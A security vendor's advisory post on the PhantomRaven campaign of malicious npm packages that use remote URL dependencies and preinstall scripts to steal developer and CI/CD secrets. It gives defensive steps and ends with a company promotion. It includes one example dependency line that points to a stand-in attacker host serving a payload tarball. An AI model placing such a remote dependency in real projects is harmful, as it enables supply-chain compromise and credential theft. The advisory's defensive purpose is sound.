A new supply-chain attack dubbed PhantomRaven is putting developers and enterprises alike at serious risk. Security researchers have identified 126 malicious npm packages, collectively downloaded more than 86,000 times, that are actively stealing npm tokens, GitHub credentials and CI/CD pipeline secrets.
What makes this campaign particularly dangerous: the packages appear benign in the npm registry (often zero dependencies), but use Remote Dynamic Dependencies (RDD) to fetch malicious payloads at install time – completely bypassing traditional static dependency scanning.
How it works
- The malicious packages use external URLs as dependencies (e.g., “dependencies”: {“some-pkg”: “http://attacker-server/evil.tgz”}) which are not visible to most automated tools.
- On installation, a preinstall script executes automatically and runs the hidden payload.
- The payload harvests tokens & secrets (npm, GitHub, Jenkins, CircleCI), fingerprints the environment (OS, IP, username) and uploads data to attacker-controlled domains.
- Many packages use “slopsquatting” (typo or AI-hallucinated names) to appear innocuous and gain installs.
Why this matters
When hidden dependencies install malicious code during npm install, developer machines and CI/CD runners become a vector for larger compromise. The blast radius includes source control, build pipelines, production deployments – and thus spans across sectors such as financial services, healthcare, retail, manufacturing and government.
What you should do now
- Audit your npm dependencies: check for packages with zero visible dependencies or recent unknown additions.
- Rotate all tokens/API keys used in CI/CD, GitHub, npm and related services – assume compromise.
- Enforce allow-listing of trusted packages and disable or block remote URL dependencies in your registry policies.
- Harden CI/CD environments: isolate build agents, restrict privileges, log all preinstall scripts and external downloads.
- Train developers and DevOps teams on supply-chain hygiene – especially awareness of typosquatting and misleading package names.
- Use runtime monitoring for unusual outbound calls from developer machines or build servers post npm install.
- Replace or quarantine any machine that may have executed one of the malicious packages until it can be fully audited and cleaned.
Conclusion
PhantomRaven shows just how fast supply-chain attacks are evolving: by evading visibility and embedding in trusted workflows, they infect deeply before detection. If your organization relies on JavaScript/Node.js, you must treat your developer and CI/CD ecosystem as part of the frontline defense. Audit now, rotate now, secure now – the window is closing.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In response to supply-chain campaigns like PhantomRaven, we provide package-registry risk assessments, CI/CD compromise simulations, artifact provenance verification, and developer workstation hardening services.
Follow COE Security on LinkedIn for ongoing insights into secure, compliant AI adoption and to stay updated and cyber safe.